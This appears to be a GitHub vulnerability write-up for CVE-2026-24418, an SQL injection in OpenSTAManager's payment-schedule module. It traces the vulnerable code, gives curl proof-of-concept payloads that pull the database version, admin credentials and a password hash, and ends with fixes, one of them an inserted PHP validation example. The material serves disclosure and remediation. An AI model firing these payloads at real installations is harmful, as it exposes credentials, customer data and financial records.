lukasz-rybak/CVE-2026-24418
GitHub: lukasz-rybak/CVE-2026-24418
An analysis and exploitation demo repository for the SQL injection vulnerability in the OpenSTAManager Scadenzario module.
# CVE-2026-24418: SQL Injection in the Bulk Actions Module of OpenSTAManager Scadenzario
## Overview
| Field | Details |
|---|---|
| **CVE ID** | [CVE-2026-24418](https://nvd.nist.gov/vuln/detail/CVE-2026-24418) |
| **Severity** | HIGH |
| **Advisory** | [View advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
## Affected Products
- **devcode-it/openstamanager** (versions: <= 2.9.8)
## CWE Classification
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
## Details
### Summary
A critical error-based SQL injection vulnerability exists in the bulk actions module of Scadenzario (Payment Schedule) in OpenSTAManager v2.9.8. It allows an authenticated attacker to extract the full database contents, including user credentials, customer personally identifiable information (PII) and financial records, through XML error messages.
**Status:** ✅ Confirmed and tested on a real instance (v2.9.8)
**Vulnerable parameter:** `id_records[]` (POST array)
**Affected endpoint:** `/actions.php?id_module=18` (Scadenzario module)
**Attack type:** Error-based SQL injection (IN clause)
### Details
OpenSTAManager v2.9.8 contains a critical error-based SQL injection vulnerability in the bulk action handler of the Scadenzario (Payment Schedule) module. The application fails to verify that the elements of the `id_records` array are integers before using them in an SQL IN() clause, which allows an attacker to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
**Vulnerability chain:**
1. **Entry point:** `/actions.php` (Lines 503-506)

   ```
   $id_records = post('id_records');
   $id_records = is_array($id_records) ? $id_records : explode(';', $id_records);
   $id_records = array_clean($id_records);
   $id_records = array_unique($id_records);
   ```

   The `array_clean()` function only removes empty values; it does not validate types.
2. **Vulnerable function:** `/lib/util.php` (Lines 54-60)

   ```
   function array_clean($array)
   {
       if (!empty($array)) {
           return array_unique(array_values(array_filter($array, fn ($value) => !empty($value))));
       }
   }
   ```

   **Impact:** the function filters out empty values but accepts any non-empty value, including SQL injection payloads.
3. **SQL injection point:** `/modules/scadenzario/bulk.php` (Line 88) **primary vulnerability**

   ```
   $scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
   ```

   **Impact:** the array elements from `$id_records` are concatenated directly with `implode()`, with no type validation and no `prepare()`, enabling full SQL injection.
**Root cause analysis:**
The vulnerability exists because:
1. `post('id_records')` returns a user-controlled array
2. `array_clean()` only removes empty values, not non-integer values
3. `implode(',', $id_records)` concatenates the array elements directly into the SQL
4. There is no validation ensuring that the array elements are integers
5. An attacker can inject SQL by supplying: `id_records[]=1&id_records[]=(malicious SQL)#`
**Affected code path:**
```
POST /actions.php?id_module=18
↓
actions.php:503 - $id_records = post('id_records')
↓
actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]
↓
actions.php:509 - include 'modules/scadenzario/bulk.php'
↓
bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]
```
### Proof of Concept
**Step 1: Log in**
```
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
```
**Step 2: Verify the vulnerability (error-based SQL injection)**
**Test 1: Extract database user and version**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**Response (error message visible to the attacker):**
```
XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'
```
**Test 2: Extract administrator credentials**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**Response:**
```
XPATH syntax error: '~admin:admin@osm.local'
```
**Test 3: Extract password hash (part 1 - first 31 characters)**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**Response:**
```
XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'
```
**Test 4: Extract password hash (part 2 - characters 32-60)**
```
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
```
**Response:**
```
XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'
```
**Combined password hash:**
```
$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK
```
### Impact
**All authenticated users with access to the bulk actions of the Scadenzario (Payment Schedule) module.**
**Suggested fix:**
**Primary fix - type validation:**
File: `/modules/scadenzario/bulk.php`
**Before (vulnerable - Line 88):**
```
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```
**After (fixed):**
```
// Validate that all array elements are integers
$id_records = array_map('intval', $id_records);
$id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
```
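As an added example (not OpenSTAManager's own code) the validation the fix section calls for, carried one step further than the page's `intval()` patch: elements that are not positive integers are rejected instead of silently coerced to 0, and the IN() list is bound through placeholders rather than spliced in with `implode()`. The function names are hypothetical, the inputs are constructed, and the project's `$database` object is not used because its prepared-statement interface is not shown on the page.

```php
<?php
// Added example, not OpenSTAManager's own code: a strict validator for the
// id_records array and a parameterised IN() clause, next to a copy of the
// lenient array_clean() behaviour the advisory describes. Inputs are constructed.
// Mirrors the page's array_clean(): drops empty values only, no type check.
function array_clean_lenient(array $array): array
{
    return array_unique(array_values(array_filter($array, fn ($v) => !empty($v))));
}
// Hardened replacement (hypothetical name): every element must be a positive
// decimal integer; any other element aborts the request instead of being dropped.
function validate_record_ids(mixed $raw): array
{
    $items = is_array($raw) ? $raw : explode(';', (string) $raw);
    $ids = [];
    foreach ($items as $item) {
        $item = trim((string) $item);
        if ($item === '') {
            continue;
        }
        if (!preg_match('/^[1-9][0-9]{0,18}$/', $item)) {
            throw new InvalidArgumentException('id_records contains a non-integer element');
        }
        $ids[(int) $item] = true; // integer keys de-duplicate and enforce the type
    }
    if ($ids === []) {
        throw new InvalidArgumentException('id_records is empty');
    }
    return array_keys($ids);
}

// Builds "IN (?,?,...)" with one placeholder per id so values never enter the SQL text.
function build_in_clause(array $ids): array
{
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return ['co_scadenziario.id IN (' . $placeholders . ')', array_values($ids)];
}
// Constructed request array: two valid ids, a duplicate, and one non-integer element.
$tainted = ['12', '7', '12', '-999) AND 1=1#'];
echo "array_clean() keeps the tainted element:\n";
var_dump(array_clean_lenient($tainted));
try {
    validate_record_ids($tainted);
} catch (InvalidArgumentException $e) {
    echo 'strict validator: ' . $e->getMessage() . "\n";
}
[$sql, $params] = build_in_clause(validate_record_ids(['12', '7', '12']));
echo $sql . "\n";
var_dump($params);
```

The bound `$params` array would be passed to the database layer's prepared-statement call; the SQL text itself only ever contains `?` markers.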
### Credits
Discovered by Łukasz Rybak
## References
- https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4xwv-49c8-fvhq
- https://nvd.nist.gov/vuln/detail/CVE-2026-24418
- https://github.com/advisories/GHSA-4xwv-49c8-fvhq
## Disclaimer
This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.